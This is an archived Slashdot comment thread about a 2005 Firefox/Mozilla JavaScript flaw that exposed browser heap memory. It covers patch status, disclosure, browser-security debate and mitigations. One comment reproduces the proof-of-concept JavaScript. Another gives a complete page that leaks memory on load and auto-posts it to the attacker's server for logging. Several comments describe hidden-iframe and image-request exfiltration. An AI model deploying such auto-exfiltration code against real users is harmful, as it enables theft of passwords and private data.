Slashdot Mirror


Mozilla / Firefox Memory Exposure Vulnerability

JimmyM writes "Secunia has a story regarding a new severe vulnerability in the Mozilla Suite and Firefox browser, which can be exploited by any web site to read all memory, which the browser process has access to. No patch is available from Mozilla. A demonstration is available here."

38 of 132 comments

  1. Did the Mozilla/Firefox guys ignore a warning? by astrashe · · Score: 3, Insightful

    Did the Mozilla/Firefox guys ignore a warning about this, or did this site publish the vulnerability without giving them a chance to patch?

    1. Re:Did the Mozilla/Firefox guys ignore a warning? by rogabean · · Score: 2, Interesting

      Excellent question.

      Just tested out the "proof test" myself. Amazing some of the stuff I still had in memory here ;)

      Followed by the browser shutting itself down after about 20 furious clicks on the link! :P

      --
      "why don't you just slip into something more comfortable...like a coma!"
    2. Re:Did the Mozilla/Firefox guys ignore a warning? by DJayC · · Score: 2, Informative
      According to bugzilla it's fixed on the trunk. The last comment for the bug associated with this vulnerability says:

      Fixed on trunk, AVIARY_1_0_1_20050124_BRANCH, and MOZILLA_1_7_BRANCH.

      Thanks for the report, I hope that's the last bug from 1997 left ;-).

      /be
    3. Re:Did the Mozilla/Firefox guys ignore a warning? by Vaevictis666 · · Score: 5, Informative

      From the bugzilla bug report (copy it, they disallow /. links):

      Opened: 2005-04-01 13:40 PDT
      Last modified: 2005-04-01 22:39 PDT
      Resolution: FIXED

      So yes they did, it was fixed in under 10 hours, and published 3 days later.

    4. Re:Did the Mozilla/Firefox guys ignore a warning? by klui · · Score: 4, Interesting

      Comments seem to indicate that it's a very old bug...

      ------- Additional Comment #6 From Brendan Eich 2005-04-01 17:49 PDT -------

      BTW, this bug is like 8+ years old. Roger Lawrence fixed half of it in 2000:

      r=norris,waldemar
      Fixes for bugs#23607, 23608, 23610, 23612, 23613. Also, first cut at URI
      encode & decode routines.

      Unfortunately, AFAICT none of the bugs he cites had anything to do with the two
      hunks of that revision:

      @@ -1061,16 +1080,22 @@ find_replen(JSContext *cx, ReplaceData *
      @@ -1138,16 +1163,17 @@ find_replen(JSContext *cx, ReplaceData *

      that half-fixed the original 1997-era bug. /be

    5. Re:Did the Mozilla/Firefox guys ignore a warning? by Anonymous Coward · · Score: 3, Informative

      You can try the 1.0.3 release candidate, in which this bug is fixed, and which is due to be rolled out very soon. See here for download links.

    6. Re:Did the Mozilla/Firefox guys ignore a warning? by BinLadenMyHero · · Score: 2, Informative

      copy it, they disallow /. links

      Or just drag the link over the tab bar. Over an empty space (or the close button if it's full) to create a new tab, or over an existing tab to load the link there.

  2. Confusing write-up by Smack · · Score: 3, Interesting

    Can a remote site actually get access to this information, or is it only displayable on the screen?

    1. Re:Confusing write-up by cjsnell · · Score: 5, Informative

      Can a remote site actually get access to this information, or is it only displayable on the screen?

      The data is being displayed within a TEXTAREA box, so it's probably as simple as adding an onClick="javascript:document.form.submit();" (or onMouseOver, etc.) to the document.

      Yes, this is very dangerous.

    2. Re:Confusing write-up by orangesquid · · Score: 2, Informative

      AFAIK, JavaScript could do something with this information, such as load an image that has ?randominfo appended, and this could be extracted from the server logs, or it could fill in a hidden item on a POST form that you're about to submit to be less obvious about it.

      --
      --TheOrangeSquid Is it any wonder things seem so awry? We swim in a sea of confusion and don't have to think to survive
    3. Re:Confusing write-up by Kelerain · · Score: 2, Interesting

      If they can display it in a form like that, they could submit that information in a hidden form window on a site where you typically expect to submit info (a login page for example). Javascript can talk to a website back end as well I think.

      Also from the article:
      "A vulnerability has been discovered in various Mozilla products, which can be exploited by malicious people to gain knowledge of potentially sensitive information."

      So yeah, this is a bit more dangerous than the old load the root folder in an iframe trick.

    4. Re:Confusing write-up by Sentry21 · · Score: 3, Interesting

      Javascript could access this, then send that information to a form via a GET request (URLencoded) to a script via a 1x1 pixel iframe hidden on the page, or even a display: hidden; iframe for that matter.

      I don't think this is necessarily a huge problem - it's a critical bug, but until we see some major code execution or phishing, it probably won't be as big of a deal as it could be.

      The question is, can they find out how big of a memory chunk they can read before they start reading? If so, they could grab god knows how many megs and start uploading it somewhere (somehow - that's too big for a GET query) and just dump it, but if they read too much and try to read what Firefox can't access, it should (emphasis 'should') get killed by Windows instead of failing silently.

  3. I'm shocked! by samael · · Score: 5, Interesting

    I seem to recall that every time an IE bug appeared people would say that Mozilla was much more secure, and that it wasn't just that IE was targeted by hackers because of the popularity, but that the software was inherently more secure.

    But now it seems there are patches for Mozilla every few weeks for _exactly_ the same kind of problems that IE used to get slated for.

    Is Mozilla actually more secure? Or is it just as bad as any other piece of software?

    1. Re:I'm shocked! by FidelCatsro · · Score: 2, Informative
      From the looks of it, these problems are not affecting the rest of the OS (as far as I can tell from the explanation on Secunia). I did a few tests and it is only reading the memory area from the browser; how far into the memory it can go I do not know (does it say? The Secunia advisory is shallow on details as usual).
      Well, unlike MSIE this is a bug rather than a feature (ActiveX), and all software has bugs, but apparently it is patched so will be rolled out soon.
      Getting details on this is not the easiest, but according to the bug reports someone was saying the problem was perhaps in the browser for the last 8 years..
      ------ Additional Comment #6 From Brendan Eich 2005-04-01 17:49 PDT -------

      BTW, this bug is like 8+ years old. Roger Lawrence fixed half of it in 2000:

      r=norris,waldemar
      Fixes for bugs#23607, 23608, 23610, 23612, 23613. Also, first cut at URI
      encode & decode routines.

      Unfortunately, AFAICT none of the bugs he cites had anything to do with the two
      hunks of that revision:

      @@ -1061,16 +1080,22 @@ find_replen(JSContext *cx, ReplaceData *
      @@ -1138,16 +1163,17 @@ find_replen(JSContext *cx, ReplaceData *

      that half-fixed the original 1997-era bug.

      /be
      --
      The only things certain in war are Propaganda and Death. You can never be sure which is which though
    2. Re:I'm shocked! by ChipMonk · · Score: 2

      The possibility of identity theft is nothing to be careless about. However, Mozilla on Unix/Linux still has the advantage over IE on Windows, in that a normal user account is not able to take down the entire system without considerable effort on the part of the attacker. Desktop Windows pre-XP had no problem with anything a user did, up to and including deleting the C:\WINDOWS directory.

      So the original assertion is still, at least partly true: The software underneath the apps is more secure.

    3. Re:I'm shocked! by samael · · Score: 2, Insightful

      Which is fair enough.

      Of course, I can reinstall the OS in about two hours.

      It's my documents I actually care about...

    4. Re:I'm shocked! by NanoGator · · Score: 3, Informative

      "Is Mozilla actually more secure? Or is it just as bad as any other piece of software?"

      It's a commonly held belief that Microsoft programmers come from Elbonia. Once it is accepted that Mozilla programmers are just as Elbonian as MS Programmers, the security zealotry will die down.

      (Disclaimer 1: This post does not say that Mozilla is less secure (or more secure, for that matter) than IE. This post does not say that Mozilla programmers are incompetent. This post does address zealotry and nothing else.)

      (Disclaimer 2: It really fucking pisses me off that I have to write this stupid disclaimer because lots of people with mod-points will not accept anything that's even remotely negative about Mozilla. Learn how to take criticism before dispensing it.)

      --
      "Derp de derp."
    5. Re:I'm shocked! by dougmc · · Score: 2, Insightful
      Mozilla is at version 1.7.5 and Firefox is at version 1.x. IE is approaching version 7.0.
      And Linux is at version 2.6.something, and Windows is at version 2003 and Solaris is at version 10 (having jumped from 2.6 to 7.) Fedora Core is at FC3 (or is that RH12?) Doom is up to Doom 3, and Jake 2.0 was released at 2.0 and never made 2.1. And I think Sid died at version 6.7. Relevance?

      Version numbers don't mean anything. They're arbitrary, and you cannot compare them to the numbers of other products like you appear to be doing, at least not in any meaningful way.

    6. Re:I'm shocked! by Ogerman · · Score: 4, Interesting

      Is Mozilla actually more secure? Or is it just as bad as any other piece of software?

      In terms of design decisions, you might easily say that Mozilla is more secure than IE. (not being integrated with OS and all..) In terms of coding bugs, Mozilla is no different than any other super complex piece of software. But there's another way to look at it. Because the Mozilla code is open, we might expect an ugly rash of bugs to be found near the beginning of its rise to popularity. But we might also expect this to rapidly taper off as all the major bugs are found and squashed. So you might say that now is a relatively dangerous time to use Mozilla (instead of say.. Konqueror or Safari). But, on the other hand, it's still not quite popular enough to attract the volume of real-world attacks that IE has received. Honestly, if you're some jerk running a malicious website, are you going to target this quirky bug in Mozilla or the myriad of IE exploits that are sure to pay off?

      What does bother me is that the Mozilla folks haven't taken automated updates seriously enough. I cringe to think of how many Firefox early adopters have no clue what that little red arrow at the top of their screen is. Or if they do, how many dial-up users will be patient enough to wait for the update to download.. which isn't really an update at all but a full copy of the latest version.

  4. oh man by Anonymous Coward · · Score: 2, Funny

    all those l33t hackers will be able to see all my pr0n!

  5. It looks like it requires Javascript by wowbagger · · Score: 2, Interesting

    It looks like, in order to make use of this flaw, the attacker must get the victim to run Javascript.

    Once again demonstrating the danger in the current mindset of "I will use Javascript to do everything, even things that can be done with plain HTML like opening a new window".

    I have my Mozilla configured to ask me if I want it to fetch Javascript from remote sites (alas, you cannot protect yourself from Javascript embedded in the HTML of the site you are visiting), to ask me if I want to run any requested plugins, and to ask be before allowing any cookies to be set on my browser.

    If you can, try this yourself - you will be AMAZED at the number of sites that insist upon setting a cookie on you the first thing when you visit them, or that insist upon trying to load Javascript, or Flash plugins.

    Cookies are fine for sites which require log-in (e.g. /.). Javascript is fine for sites that need to do some client side processing (e.g. order entry sites which use JS to compute the order amounts to avoid a round-trip to the server). Flash is fine for some applications.

    But please don't over use them.

    1. Re:It looks like it requires Javascript by ChipMonk · · Score: 2, Informative

      Only if JavaScript is completely disabled, will this attack fail. JavaScript in the [HEAD] block executes as soon as the page loads. If this code is buried in that block, it will execute without any further intervention from the user.

  6. Definitely a big hole by RzUpAnmsCwrds · · Score: 4, Insightful

    This is a *huge* hole. In three clicks, it disclosed previous URLs that I had visited, POSTDATA (including my Slashdot password) and a bunch of other stuff.

    If this could be automated (and it easily could be with something like XML-RPC), imagine the possibilities for phishing. Visit a page, have your credit card number disclosed.

    Time for Firefox 1.03.

  7. IE & Opera Unaffected by TFGeditor · · Score: 4, Interesting

    Just for grins, I tried it with IE and Opera. Just threw up a bunch of XXXXX in the text box.

    Clearly a Mozilla-specific problem.

    --
    Ignorance is curable, stupid is forever.
    1. Re:IE & Opera Unaffected by MoogMan · · Score: 2, Funny

      Well yeah, otherwise the headline would be

      "Mozilla / Firefox / IE / Opera Memory Exposure Vulnerability"

      wouldn't it?

    2. Re:IE & Opera Unaffected by Zork+the+Almighty · · Score: 4, Insightful

      No, it would be "New Critical IE Vulnerability" and it would be on the front page...

      --

      In Soviet America the banks rob you!
  8. Simple JavaScript by duerra · · Score: 2, Insightful

    It works if you don't click quickly and repeatedly in Firefox.

    It's almost scary... the JavaScript for this looks to just abuse a buffer overflow in an almost scary-easy way.

    function genGluck(str){
        var x = str;
        var rx=/end/i;
        x = x.replace(rx,function($1){
            $1.match(rx);
            return "";
        });
        x = x.replace(/^end/,"");
        return x;
    }

    function readMemory()
    {
        var mem = genGluck("{10,246 "X's" here}end");

        mem = mem.replace(/[^\.\\\:\/\'\(\)\"\_\?\=\%\&\;\#\@\- a-zA-Z0-9]+/g, " ");

        document.getElementById('result').value = mem;
    }

  9. No problem here by jkerman · · Score: 2, Informative

    just displays all "XXXXXXXXXXX" for me.

    using OSX with nightly builds auto-downloaded with FireFix (which is a really neat app)

    1. Re:No problem here by dougmc · · Score: 2, Funny
      just displays all "XXXXXXXXXXX" for me.
      Hey! How did it find my password on your browser?!@?!@$?!
  10. Ok, confirmed by cjsnell · · Score: 4, Informative
    You can write a nasty little page that continuously dumps the 10k bytes of memory data to a file on your server. Here's an example that uses an HTML::Mason page to do this:
    <HTML>
    <HEAD>
    <TITLE>Nasty Demo</TITLE>
    </HEAD>
    <BODY BGCOLOR='#FFFFFF' COLOR='#222222' onLoad="readMemory();">
    <SCRIPT language="JavaScript">
    function genGluck(str){
    var x = str;
    var rx=/end/i;
    x = x.replace(rx,function($1){
    $1.match(rx);
    return "";
    });
    x = x.replace(/^end/,"");
    return x;
    }

    function readMemory()
    {

    First piece of readMemory() removed to satisfy Slashdot crapfilter
    mem = mem.replace(/[^\.\\\:\/\'\(\)\"\_\?\=\%\&\;\#\@\- a-zA-Z0-9]+/g, " ");

    document.nasty.result.value = mem;

    document.nasty.submit();

    }

    </SCRIPT>
    <FORM METHOD=POST NAME='nasty'>
    <INPUT NAME=result TYPE=HIDDEN VALUE='' onClick='readMemory();'>
    </FORM>
    <BR><BR>
    </BODY>
    </HTML>

    <%args>
    $result => ''
    </%args>
    <%init>
    open(OUTFILE,'>>/tmp/outfile');
    print OUTFILE $result;
    close(OUTFILE);
    </%init>
  11. Safari slightly vulnerable? by inio · · Score: 2, Insightful

    In addition to a bunch of Xs, Safari threw a little piece of Javascript code not originating on the source page into the end of the text box. Looks like it might be a little vulnerable too.

    1. Re:Safari slightly vulnerable? by LincolnQ · · Score: 2, Insightful

      No, Safari doesn't support Javascript's function objects (lambdas?), which the test seems to use. I don't know if rewriting the test in a different way would make it work, but I doubt it. It appears to be a flaw in the regular expression engine in Gecko.

  12. Download the latest patched version right here by OmegaGX · · Score: 3, Informative

    Download the latest patched version right here: http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-trunk/firefox-1.0+.en-US.win32.installer.exe
    I just used it and I am not vulnerable: all I see are lots of X's just like in IE.

  13. Access to firefox heap, not entire system by jgoemat · · Score: 2, Insightful
    This exploits a vulnerability in Mozilla/FireFox's javascript engine. It allows the javascript code on the web page to access an arbitrary amount of heap data of the FireFox application. The locations in memory and the size of the block returned cannot be set, so you basically get random data from FireFox's heap. Most likely under a kilobyte of data will be returned, and it will most likely be data from some web page or file you downloaded.

    This data is available to the javascript engine then, so it is possible for the javascript to submit it a number of ways to an internet server. It could call a web service with the data or post it to a web page. The server could then organize this data and examine it for anything interesting.

    This will not allow someone to read your personal files or hijack your computer. The real problem would be if stored passwords or sensitive data from web mail or banking sites were on the heap and were found this way and transmitted to a web site. A large amount of 'Junk' would have to be sifted through in order to get any juicy data though.

    The only way to be safe right now is (in FireFox) to go to Tools->Options, go to "Web Features", and uncheck "Enable Javascript". Seeing as many sites (including /.) require javascript to use, this really isn't a good option. I hope the team gets a fixed version out soon.

    1. Re:Access to firefox heap, not entire system by TheGratefulNet · · Score: 2, Informative

      slash requires js?

      since when?

      I disable js for all but 1 or 2 sites that I visit.

      prefbar (mozilla/firefox) allows a single click to turn on/off jscript. get it and use it.

      but you don't need js for slash. you never have.

      --
      "It is now safe to switch off your computer."
  14. comma by Anonymous Coward · · Score: 5, Insightful
    which can be exploited by any web site to read all memory, which the browser process has access to

    I don't normally complain about the grammar and punctuation of submitters and editors, but in this case it is too significant. The difference between

    read all memory, which the browser process has access to

    and

    read all memory which the browser process has access to

    is profound. The first form says that the browser has access to all memory. The second form says that the web site has access to all the memory to which the browser also has access. Catching and fixing stuff like this is what an editor does. If Slashdot's people can't do that, then don't call them editors. Call them "Dudes Who Click Approve," or something like that.

  15. Re:CRASH? by srstoneb · · Score: 2, Interesting

    The first time I tried it, it didn't merely crash Firefox. When I clicked the "test now" link my entire system immediately died, and began rebooting. After reboot, the test now works (and confirms my vulnerability).

    Windows 98 SE, Firefox 1.0.2.

  16. Other Gecko-based browsers affected as well. by Lazyhound · · Score: 2, Insightful

    K-Meleon has the same problem, only it probably won't be patched for months, forcing me back to Firefox. Bah.